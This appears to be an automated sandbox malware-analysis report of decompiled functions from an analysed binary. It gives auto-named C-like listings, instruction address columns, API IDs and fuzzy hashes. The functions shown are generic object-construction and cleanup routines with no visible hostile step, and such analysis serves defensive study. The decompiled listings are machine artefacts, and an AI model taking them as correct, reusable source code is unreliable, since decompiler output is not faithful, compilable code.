					_t71 = E00B5D45B(_t118 - 0x9c, _t116 + 0xb0,  *((intOrPtr*)(_t118 + 0x14)), _t116 + 0x200, _t116 + 0x201, _t116 + 0x204); // executed
					__eflags = _t71;
					 *((intOrPtr*)(_t118 + 0x10)) = _t71;
					if(_t71 == 0) {
						E00B1A98B(_t116 + 0xa8,  *((intOrPtr*)(_t118 + 0xc)));
						_t73 =  *((intOrPtr*)(_t118 - 0x9c));
						 *((char*)(_t118 - 4)) = 3;
						__eflags = _t73;
						if(_t73 != 0) {
							 *((intOrPtr*)( *_t73 + 8))(_t73);
						}
						_t74 =  *((intOrPtr*)(_t118 + 0x14));
						 *((char*)(_t118 - 4)) = 2;
						__eflags = _t74;
						if(_t74 != 0) {
							 *((intOrPtr*)( *_t74 + 8))(_t74);
						}
						__eflags = _t113;
						 *((char*)(_t118 - 4)) = 1;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t113 + 8))(_t113);
						}
						 *((intOrPtr*)(_t118 - 4)) = 0;
						E00B5EBE8(0, _t116, __eflags);
						_t76 = 0;
					} else {
						_t81 =  *((intOrPtr*)(_t118 - 0x9c));
						 *((char*)(_t118 - 4)) = 3;
						__eflags = _t81;
						if(_t81 != 0) {
							 *((intOrPtr*)( *_t81 + 8))(_t81);
						}
						_t82 =  *((intOrPtr*)(_t118 + 0x14));
						 *((char*)(_t118 - 4)) = 2;
						__eflags = _t82;
						if(_t82 != 0) {
							 *((intOrPtr*)( *_t82 + 8))(_t82);
						}
						__eflags = _t113;
						 *((char*)(_t118 - 4)) = 1;
						if(_t113 != 0) {
							 *((intOrPtr*)( *_t113 + 8))(_t113);
						}
						_t76 =  *((intOrPtr*)(_t118 + 0x10));
					}
				} else {
					_t87 =  *((intOrPtr*)(_t118 - 0x9c));
					 *((char*)(_t118 - 4)) = 3;
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t118 + 0x14));
					 *((char*)(_t118 - 4)) = 2;
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					 *((char*)(_t118 - 4)) = 1;
					if(_t113 != 0) {
						 *((intOrPtr*)( *_t113 + 8))(_t113);
					}
					_t76 =  *((intOrPtr*)(_t118 + 0x10));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t118 - 0xc));
				return _t76;
			}




















                                                                                                                    0x00b58f18
                                                                                                                    0x00b58f25
                                                                                                                    0x00b58f29
                                                                                                                    0x00b58f31
                                                                                                                    0x00b58f34
                                                                                                                    0x00b58f37
                                                                                                                    0x00b58f3a
                                                                                                                    0x00b58f42
                                                                                                                    0x00b58f46
                                                                                                                    0x00b58f49
                                                                                                                    0x00b58f4e
                                                                                                                    0x00b58f4e
                                                                                                                    0x00b58f51
                                                                                                                    0x00b58f54
                                                                                                                    0x00b58f56
                                                                                                                    0x00b58f5a
                                                                                                                    0x00b58f68
                                                                                                                    0x00b58f68
                                                                                                                    0x00b58f70
                                                                                                                    0x00b58f76
                                                                                                                    0x00b58f7c
                                                                                                                    0x00b58f88
                                                                                                                    0x00b58f8c
                                                                                                                    0x00b58f95
                                                                                                                    0x00b58f9c
                                                                                                                    0x00b58f9f
                                                                                                                    0x00b59000
                                                                                                                    0x00b59008
                                                                                                                    0x00b5900d
                                                                                                                    0x00b5900f
                                                                                                                    0x00b59012
                                                                                                                    0x00b59055
                                                                                                                    0x00b5905a
                                                                                                                    0x00b59060
                                                                                                                    0x00b59064
                                                                                                                    0x00b59066
                                                                                                                    0x00b5906b
                                                                                                                    0x00b5906b
                                                                                                                    0x00b5906e
                                                                                                                    0x00b59071
                                                                                                                    0x00b59075
                                                                                                                    0x00b59077
                                                                                                                    0x00b5907c
                                                                                                                    0x00b5907c
                                                                                                                    0x00b5907f
                                                                                                                    0x00b59081
                                                                                                                    0x00b59085
                                                                                                                    0x00b5908a
                                                                                                                    0x00b5908a
                                                                                                                    0x00b5908f
                                                                                                                    0x00b59092
                                                                                                                    0x00b59097
                                                                                                                    0x00b59014
                                                                                                                    0x00b59014
                                                                                                                    0x00b5901a
                                                                                                                    0x00b5901e
                                                                                                                    0x00b59020
                                                                                                                    0x00b59025
                                                                                                                    0x00b59025
                                                                                                                    0x00b59028
                                                                                                                    0x00b5902b
                                                                                                                    0x00b5902f
                                                                                                                    0x00b59031
                                                                                                                    0x00b59036
                                                                                                                    0x00b59036
                                                                                                                    0x00b59039
                                                                                                                    0x00b5903b
                                                                                                                    0x00b5903f
                                                                                                                    0x00b59044
                                                                                                                    0x00b59044
                                                                                                                    0x00b59047
                                                                                                                    0x00b59047
                                                                                                                    0x00b58fa1
                                                                                                                    0x00b58fa1
                                                                                                                    0x00b58fa7
                                                                                                                    0x00b58fad
                                                                                                                    0x00b58fb2
                                                                                                                    0x00b58fb2
                                                                                                                    0x00b58fb5
                                                                                                                    0x00b58fb8
                                                                                                                    0x00b58fbe
                                                                                                                    0x00b58fc3
                                                                                                                    0x00b58fc3
                                                                                                                    0x00b58fc8
                                                                                                                    0x00b58fcc
                                                                                                                    0x00b58fd1
                                                                                                                    0x00b58fd1
                                                                                                                    0x00b58fd4
                                                                                                                    0x00b58fd4
                                                                                                                    0x00b590ba
                                                                                                                    0x00b590c3

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B58F18
                                                                                                                      • Part of subcall function 00B5D45B: __EH_prolog.LIBCMT ref: 00B5D460
                                                                                                                      • Part of subcall function 00B5D45B: _CxxThrowException.MSVCRT(?,00B98128), ref: 00B5D4AB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2366012087-0
                                                                                                                    • Opcode ID: 5e438cfb7672232a7dec15fca3d97a758b7245054414af6cdf980fa150785109
                                                                                                                    • Instruction ID: 6c2fa41babb4dc381f5a06e1eed646470558dc45ee0002d3e3d06df027713ddf
                                                                                                                    • Opcode Fuzzy Hash: 5e438cfb7672232a7dec15fca3d97a758b7245054414af6cdf980fa150785109
                                                                                                                    • Instruction Fuzzy Hash: 17515E70900289DFCB11DFA8C488BAEBBF5EF49305F1848DDE85A97242C7759E49CB21
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4E578 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B4E578(intOrPtr __ecx) {
				intOrPtr _t69;
				signed int _t72;
				signed int _t73;
				intOrPtr* _t74;
				intOrPtr _t75;
				signed int _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				void* _t79;
				signed int _t81;
				signed int _t84;
				intOrPtr* _t88;
				intOrPtr _t92;
				signed int _t95;
				void* _t98;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr* _t117;
				intOrPtr _t121;
				void* _t123;

				L00B7F140(E00B86B24, _t123);
				_t121 = __ecx;
				_t69 =  *((intOrPtr*)(__ecx + 0x68));
				_t92 = 1;
				if(_t69 == 0) {
					 *((intOrPtr*)(_t123 - 0x18)) =  *((intOrPtr*)(__ecx + 0x20));
				} else {
					 *((intOrPtr*)(_t123 - 0x18)) = _t92;
				}
				if(_t69 == 0) {
					 *((intOrPtr*)(_t123 - 0x14)) = _t92;
				} else {
					 *((intOrPtr*)(_t123 - 0x14)) =  *((intOrPtr*)(_t121 + 0x20));
				}
				_t117 = _t121 + 0x50;
				E00B4EF37(_t117,  *((intOrPtr*)(_t123 - 0x18)));
				_t88 = _t121 + 0x5c;
				E00B4EF37(_t88,  *((intOrPtr*)(_t123 - 0x14))); // executed
				_t72 = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(_t123 - 0x18)) > 0) {
					do {
						_t84 =  *(_t117 + 4);
						 *(_t117 + 4) = _t84 + 1;
						 *((intOrPtr*)( *_t117 + _t84 * 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x70)) + _t72 * 4))));
						_t72 =  *(_t123 - 0x10) + 1;
						 *(_t123 - 0x10) = _t72;
					} while (_t72 <  *((intOrPtr*)(_t123 - 0x18)));
				}
				_t73 = 0;
				 *(_t123 - 0x10) = 0;
				if( *((intOrPtr*)(_t123 - 0x14)) > 0) {
					do {
						_t81 =  *(_t88 + 4);
						 *(_t88 + 4) = _t81 + 1;
						 *((intOrPtr*)( *_t88 + _t81 * 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x7c)) + _t73 * 4))));
						_t73 =  *(_t123 - 0x10) + 1;
						 *(_t123 - 0x10) = _t73;
					} while (_t73 <  *((intOrPtr*)(_t123 - 0x14)));
				}
				 *((intOrPtr*)(_t123 - 0x1c)) = _t121;
				_t74 =  *((intOrPtr*)(_t121 + 0x18));
				 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
				if(_t74 == 0) {
					_t75 =  *((intOrPtr*)(_t121 + 0x68));
					if(_t75 == 0) {
						_t95 = _t121 + 0x30;
					} else {
						_t95 =  *(_t121 + 0x40);
					}
					_t76 = _t121 + 0x30;
					if(_t75 == 0) {
						_t76 =  *(_t121 + 0x40);
					}
					 *(_t123 - 0x10) = _t76;
					_t77 =  *((intOrPtr*)(_t121 + 0x1c));
					_t78 =  *((intOrPtr*)( *_t77 + 0xc))(_t77,  *_t117,  *(_t123 - 0x10),  *((intOrPtr*)(_t123 - 0x18)),  *_t88, _t95,  *((intOrPtr*)(_t123 - 0x14)),  *((intOrPtr*)(_t123 + 8)));
				} else {
					_t108 =  *((intOrPtr*)(_t121 + 0x68));
					if(_t108 == 0) {
						_t98 =  *(_t121 + 0x30);
					} else {
						_t98 =  *( *(_t121 + 0x40));
					}
					if(_t108 == 0) {
						_t110 =  *( *(_t121 + 0x40));
					} else {
						_t110 =  *(_t121 + 0x30);
					}
					 *((intOrPtr*)(_t123 - 0x18)) = _t110;
					_t78 =  *((intOrPtr*)( *_t74 + 0xc))(_t74,  *((intOrPtr*)( *_t117)),  *((intOrPtr*)( *_t88)),  *((intOrPtr*)(_t123 - 0x18)), _t98,  *((intOrPtr*)(_t123 + 8)));
				}
				 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t121 + 0x6c)) = _t78;
				_t79 = E00B4E6BE(_t121);
				 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0xc));
				return _t79;
			}























                                                                                                                    0x00b4e57d
                                                                                                                    0x00b4e587
                                                                                                                    0x00b4e58c
                                                                                                                    0x00b4e58f
                                                                                                                    0x00b4e592
                                                                                                                    0x00b4e59c
                                                                                                                    0x00b4e594
                                                                                                                    0x00b4e594
                                                                                                                    0x00b4e594
                                                                                                                    0x00b4e5a1
                                                                                                                    0x00b4e5ab
                                                                                                                    0x00b4e5a3
                                                                                                                    0x00b4e5a6
                                                                                                                    0x00b4e5a6
                                                                                                                    0x00b4e5b1
                                                                                                                    0x00b4e5b6
                                                                                                                    0x00b4e5be
                                                                                                                    0x00b4e5c3
                                                                                                                    0x00b4e5c8
                                                                                                                    0x00b4e5cd
                                                                                                                    0x00b4e5d0
                                                                                                                    0x00b4e5d2
                                                                                                                    0x00b4e5da
                                                                                                                    0x00b4e5e0
                                                                                                                    0x00b4e5e5
                                                                                                                    0x00b4e5eb
                                                                                                                    0x00b4e5ef
                                                                                                                    0x00b4e5ef
                                                                                                                    0x00b4e5d2
                                                                                                                    0x00b4e5f4
                                                                                                                    0x00b4e5f9
                                                                                                                    0x00b4e5fc
                                                                                                                    0x00b4e5fe
                                                                                                                    0x00b4e606
                                                                                                                    0x00b4e60c
                                                                                                                    0x00b4e611
                                                                                                                    0x00b4e617
                                                                                                                    0x00b4e61b
                                                                                                                    0x00b4e61b
                                                                                                                    0x00b4e5fe
                                                                                                                    0x00b4e620
                                                                                                                    0x00b4e623
                                                                                                                    0x00b4e626
                                                                                                                    0x00b4e62c
                                                                                                                    0x00b4e667
                                                                                                                    0x00b4e66c
                                                                                                                    0x00b4e673
                                                                                                                    0x00b4e66e
                                                                                                                    0x00b4e66e
                                                                                                                    0x00b4e66e
                                                                                                                    0x00b4e678
                                                                                                                    0x00b4e67b
                                                                                                                    0x00b4e67d
                                                                                                                    0x00b4e67d
                                                                                                                    0x00b4e687
                                                                                                                    0x00b4e68d
                                                                                                                    0x00b4e69c
                                                                                                                    0x00b4e62e
                                                                                                                    0x00b4e62e
                                                                                                                    0x00b4e633
                                                                                                                    0x00b4e63c
                                                                                                                    0x00b4e635
                                                                                                                    0x00b4e638
                                                                                                                    0x00b4e638
                                                                                                                    0x00b4e641
                                                                                                                    0x00b4e64b
                                                                                                                    0x00b4e643
                                                                                                                    0x00b4e643
                                                                                                                    0x00b4e643
                                                                                                                    0x00b4e650
                                                                                                                    0x00b4e662
                                                                                                                    0x00b4e662
                                                                                                                    0x00b4e69f
                                                                                                                    0x00b4e6a5
                                                                                                                    0x00b4e6a8
                                                                                                                    0x00b4e6b3
                                                                                                                    0x00b4e6bb

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: d5afc8da3bd4346f79bec1f2de8bf12ac8aeee8a9c1eef1f80db9c0d3c8ff64f
                                                                                                                    • Instruction ID: aa4728056373d284bb8b10e764884eba8028a1d830f4ceed711362fed8b78864
                                                                                                                    • Opcode Fuzzy Hash: d5afc8da3bd4346f79bec1f2de8bf12ac8aeee8a9c1eef1f80db9c0d3c8ff64f
                                                                                                                    • Instruction Fuzzy Hash: 02513874A00616DFCB14DF64C4809AAFBF2FF89304B10899DE5A2AB750D731EA15DF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B56C62 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00B56C62(void* __ecx) {
				intOrPtr _t58;
				intOrPtr* _t59;
				void* _t66;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr _t70;
				intOrPtr* _t72;
				void* _t78;
				signed int _t81;
				intOrPtr _t85;
				signed int* _t87;
				signed int _t88;
				intOrPtr* _t95;
				void* _t98;
				intOrPtr* _t99;
				void* _t100;
				void* _t102;

				L00B7F140(0xb8747c, _t102);
				_push(__ecx);
				_t98 = __ecx;
				_t81 =  *(__ecx + 0x28);
				_t58 =  *((intOrPtr*)(__ecx + 0x2c));
				_t87 =  *(__ecx + 0x20);
				_t95 = (_t81 << 4) +  *((intOrPtr*)(_t58 + 0x58));
				if(_t87 == 0) {
					_t88 = _t81;
				} else {
					_t88 =  *_t87;
				}
				if(_t81 != _t88) {
					 *(_t102 - 0x10) = 2;
				} else {
					 *(_t102 - 0x10) = 0 |  *((intOrPtr*)(_t98 + 0xc)) != 0x00000000;
				}
				if( *((intOrPtr*)(_t102 + 8)) != 0 &&  *(_t102 - 0x10) == 0 && (_t81 >=  *((intOrPtr*)(_t58 + 0xe0)) ||  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xdc)) + _t81)) == 0) &&  *((intOrPtr*)(_t95 + 0xd)) == 0) {
					 *(_t102 - 0x10) = 1;
				}
				 *((intOrPtr*)(_t102 + 8)) = 0;
				_t59 =  *((intOrPtr*)(_t98 + 0x30));
				 *(_t102 - 4) = 0;
				_t78 =  *((intOrPtr*)( *_t59 + 0x14))(_t59, _t81, _t102 + 8,  *(_t102 - 0x10));
				if(_t78 == 0) {
					E00B1A98B(_t98 + 8,  *((intOrPtr*)(_t102 + 8)));
					 *(_t98 + 0x10) =  *(_t98 + 0x10) | 0xffffffff;
					if( *((char*)(_t98 + 0xd)) != 0 &&  *((char*)(_t95 + 0xe)) != 0 &&  *((char*)(_t95 + 0xd)) == 0) {
						_push(1);
						_pop(0);
					}
					 *((char*)(_t98 + 0xf)) = 0;
					 *((char*)(_t98 + 0xe)) = 1;
					 *((intOrPtr*)(_t98 + 0x18)) =  *_t95;
					 *((intOrPtr*)(_t98 + 0x1c)) =  *((intOrPtr*)(_t95 + 4));
					if( *(_t102 - 0x10) == 0 &&  *((intOrPtr*)(_t102 + 8)) == 0) {
						_t70 =  *((intOrPtr*)(_t98 + 0x2c));
						_t85 =  *((intOrPtr*)(_t98 + 0x28));
						if(_t85 >=  *((intOrPtr*)(_t70 + 0xe0)) ||  *((char*)( *((intOrPtr*)(_t70 + 0xdc)) + _t85)) == 0) {
							if( *((char*)(_t95 + 0xd)) == 0) {
								 *(_t102 - 0x10) = 2;
							}
						}
					}
					_t99 =  *((intOrPtr*)(_t98 + 0x30));
					_t66 =  *((intOrPtr*)( *_t99 + 0x18))(_t99,  *(_t102 - 0x10));
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					_t100 = _t66;
					_t67 =  *((intOrPtr*)(_t102 + 8));
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 8))(_t67);
					}
					_t68 = _t100;
				} else {
					_t72 =  *((intOrPtr*)(_t102 + 8));
					 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t68 = _t78;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t102 - 0xc));
				return _t68;
			}




















                                                                                                                    0x00b56c67
                                                                                                                    0x00b56c6c
                                                                                                                    0x00b56c6f
                                                                                                                    0x00b56c74
                                                                                                                    0x00b56c77
                                                                                                                    0x00b56c7a
                                                                                                                    0x00b56c82
                                                                                                                    0x00b56c87
                                                                                                                    0x00b56c8d
                                                                                                                    0x00b56c89
                                                                                                                    0x00b56c89
                                                                                                                    0x00b56c89
                                                                                                                    0x00b56c91
                                                                                                                    0x00b56ca0
                                                                                                                    0x00b56c93
                                                                                                                    0x00b56c9b
                                                                                                                    0x00b56c9b
                                                                                                                    0x00b56caa
                                                                                                                    0x00b56cc9
                                                                                                                    0x00b56cc9
                                                                                                                    0x00b56cd0
                                                                                                                    0x00b56cd6
                                                                                                                    0x00b56cd9
                                                                                                                    0x00b56ce7
                                                                                                                    0x00b56ceb
                                                                                                                    0x00b56d0b
                                                                                                                    0x00b56d10
                                                                                                                    0x00b56d18
                                                                                                                    0x00b56d26
                                                                                                                    0x00b56d28
                                                                                                                    0x00b56d28
                                                                                                                    0x00b56d31
                                                                                                                    0x00b56d34
                                                                                                                    0x00b56d3a
                                                                                                                    0x00b56d40
                                                                                                                    0x00b56d43
                                                                                                                    0x00b56d4b
                                                                                                                    0x00b56d4e
                                                                                                                    0x00b56d57
                                                                                                                    0x00b56d69
                                                                                                                    0x00b56d6b
                                                                                                                    0x00b56d6b
                                                                                                                    0x00b56d69
                                                                                                                    0x00b56d57
                                                                                                                    0x00b56d72
                                                                                                                    0x00b56d7b
                                                                                                                    0x00b56d7e
                                                                                                                    0x00b56d82
                                                                                                                    0x00b56d84
                                                                                                                    0x00b56d89
                                                                                                                    0x00b56d8e
                                                                                                                    0x00b56d8e
                                                                                                                    0x00b56d91
                                                                                                                    0x00b56ced
                                                                                                                    0x00b56ced
                                                                                                                    0x00b56cf0
                                                                                                                    0x00b56cf6
                                                                                                                    0x00b56cfb
                                                                                                                    0x00b56cfb
                                                                                                                    0x00b56cfe
                                                                                                                    0x00b56cfe
                                                                                                                    0x00b56d99
                                                                                                                    0x00b56da1

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: c205932c27cbabded703d6bdd3c80328e69d70ba733554beb279cfe46d22811a
                                                                                                                    • Instruction ID: 562fc4319c492f7ddb12cfb4fbe2dff544df266f484b097d0d6e7b064fa150e1
                                                                                                                    • Opcode Fuzzy Hash: c205932c27cbabded703d6bdd3c80328e69d70ba733554beb279cfe46d22811a
                                                                                                                    • Instruction Fuzzy Hash: CF418E70A00685AFDB24CF64C484B6ABBF0FF44355F548AEDD89687691D770ED88CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B22F49 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00B22F49(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t77;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				intOrPtr _t86;
				char _t88;
				intOrPtr _t103;
				intOrPtr* _t110;
				void* _t112;
				void* _t115;

				_t115 = __eflags;
				L00B7F140(0xb8390b, _t112);
				_push(__ecx);
				_push(__ecx);
				_t110 = __ecx;
				 *((intOrPtr*)(_t112 - 0x10)) = __ecx;
				 *__ecx = 0xb8a664;
				 *((intOrPtr*)(__ecx + 4)) = 0xb8a654;
				 *((intOrPtr*)(__ecx + 8)) = 0xb8a644;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xb8a634;
				 *((intOrPtr*)(__ecx + 0x10)) = 0xb8a620;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xb8a610;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				L00B2315B(__ecx + 0x20);
				 *((char*)(__ecx + 0x32)) = 1;
				 *((char*)(__ecx + 0x33)) = 1;
				 *((char*)(__ecx + 0x34)) = 1;
				 *((char*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((intOrPtr*)(_t112 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((char*)(_t112 - 4)) = 2;
				E00B12D90(__ecx + 0x5c);
				 *((char*)(_t112 - 4)) = 3;
				E00B12D90(__ecx + 0x68);
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((char*)(_t112 - 4)) = 6;
				L00B23104(__ecx + 0x80, _t115);
				 *((char*)(_t112 - 4)) = 7;
				E00B12D90(__ecx + 0xc0);
				 *((char*)(_t112 - 4)) = 8;
				L00B234A2(__ecx + 0xd8);
				 *((intOrPtr*)(__ecx + 0x11c)) = 0;
				_t77 = __ecx + 0x120;
				 *_t77 = 0;
				 *((intOrPtr*)(_t77 + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x12c)) = 0;
				 *((intOrPtr*)(__ecx + 0x134)) = 0;
				_t78 = __ecx + 0x140;
				 *_t78 = 0;
				 *((intOrPtr*)(_t78 + 4)) = 0;
				 *((intOrPtr*)(_t78 + 8)) = 0;
				_t107 = __ecx + 0x14c;
				 *((intOrPtr*)(__ecx + 0x14c)) = 0;
				_t79 = __ecx + 0x164;
				 *_t79 = 0;
				 *((intOrPtr*)(_t79 + 4)) = 0;
				 *((intOrPtr*)(_t79 + 8)) = 0;
				_t80 = __ecx + 0x178;
				 *_t80 = 0;
				 *((intOrPtr*)(_t80 + 4)) = 0;
				 *((char*)(_t112 - 4)) = 0x10;
				E00B12D90(__ecx + 0x1b0);
				_t82 = __ecx + 0x1bc;
				 *_t82 = 0;
				 *((intOrPtr*)(_t82 + 4)) = 0;
				 *((intOrPtr*)(_t82 + 8)) = 0;
				 *((intOrPtr*)(_t82 + 0xc)) = 0;
				 *((intOrPtr*)(_t82 + 0x10)) = 0;
				 *((intOrPtr*)(_t82 + 0x14)) = 0;
				 *((char*)(_t112 - 4)) = 0x12;
				L00B2319F(__ecx + 0x1d4);
				_t84 = _t110 + 0x1e4;
				 *_t84 = 0;
				 *((intOrPtr*)(_t84 + 4)) = 0;
				 *((intOrPtr*)(_t84 + 8)) = 0;
				_push(0x30);
				 *((char*)(_t112 - 4)) = 0x14;
				 *_t110 = 0xb8a5f0;
				 *((intOrPtr*)(_t110 + 4)) = 0xb8a5e0;
				 *((intOrPtr*)(_t110 + 8)) = 0xb8a5d0;
				 *((intOrPtr*)(_t110 + 0xc)) = 0xb8a5c0;
				 *((intOrPtr*)(_t110 + 0x10)) = 0xb8a5ac;
				 *((intOrPtr*)(_t110 + 0x14)) = 0xb8a59c;
				_t103 = E00B11E55();
				 *((intOrPtr*)(_t112 - 0x14)) = _t103;
				_t116 = _t103;
				 *((char*)(_t112 - 4)) = 0x15;
				if(_t103 == 0) {
					_t86 = 0;
					__eflags = 0;
				} else {
					_t86 = L00B1F682(_t103);
				}
				 *((char*)(_t112 - 4)) = 0x14;
				 *((intOrPtr*)(_t110 + 0x180)) = _t86;
				E00B1A98B(_t107, _t86); // executed
				_t88 = E00B22A5F(_t116); // executed
				 *((char*)(_t110 + 0x170)) = _t88;
				 *[fs:0x0] =  *((intOrPtr*)(_t112 - 0xc));
				return _t110;
			}















                                                                                                                    0x00b22f49
                                                                                                                    0x00b22f4e
                                                                                                                    0x00b22f53
                                                                                                                    0x00b22f54
                                                                                                                    0x00b22f57
                                                                                                                    0x00b22f5c
                                                                                                                    0x00b22f5f
                                                                                                                    0x00b22f65
                                                                                                                    0x00b22f6c
                                                                                                                    0x00b22f73
                                                                                                                    0x00b22f7a
                                                                                                                    0x00b22f81
                                                                                                                    0x00b22f88
                                                                                                                    0x00b22f8e
                                                                                                                    0x00b22f91
                                                                                                                    0x00b22f96
                                                                                                                    0x00b22f9a
                                                                                                                    0x00b22f9e
                                                                                                                    0x00b22fa2
                                                                                                                    0x00b22fa5
                                                                                                                    0x00b22fa8
                                                                                                                    0x00b22fab
                                                                                                                    0x00b22fae
                                                                                                                    0x00b22fb4
                                                                                                                    0x00b22fb8
                                                                                                                    0x00b22fc0
                                                                                                                    0x00b22fc4
                                                                                                                    0x00b22fc9
                                                                                                                    0x00b22fcc
                                                                                                                    0x00b22fd5
                                                                                                                    0x00b22fd9
                                                                                                                    0x00b22fe4
                                                                                                                    0x00b22fe8
                                                                                                                    0x00b22ff3
                                                                                                                    0x00b22ff7
                                                                                                                    0x00b22ffc
                                                                                                                    0x00b23002
                                                                                                                    0x00b23008
                                                                                                                    0x00b2300a
                                                                                                                    0x00b2300d
                                                                                                                    0x00b23013
                                                                                                                    0x00b23019
                                                                                                                    0x00b2301f
                                                                                                                    0x00b23021
                                                                                                                    0x00b23024
                                                                                                                    0x00b23027
                                                                                                                    0x00b2302d
                                                                                                                    0x00b2302f
                                                                                                                    0x00b23035
                                                                                                                    0x00b23037
                                                                                                                    0x00b2303a
                                                                                                                    0x00b2303d
                                                                                                                    0x00b23043
                                                                                                                    0x00b23045
                                                                                                                    0x00b2304e
                                                                                                                    0x00b23052
                                                                                                                    0x00b23057
                                                                                                                    0x00b2305d
                                                                                                                    0x00b2305f
                                                                                                                    0x00b23062
                                                                                                                    0x00b23065
                                                                                                                    0x00b23068
                                                                                                                    0x00b2306b
                                                                                                                    0x00b23074
                                                                                                                    0x00b23078
                                                                                                                    0x00b2307d
                                                                                                                    0x00b23083
                                                                                                                    0x00b23085
                                                                                                                    0x00b23088
                                                                                                                    0x00b2308b
                                                                                                                    0x00b2308d
                                                                                                                    0x00b23091
                                                                                                                    0x00b23097
                                                                                                                    0x00b2309e
                                                                                                                    0x00b230a5
                                                                                                                    0x00b230ac
                                                                                                                    0x00b230b3
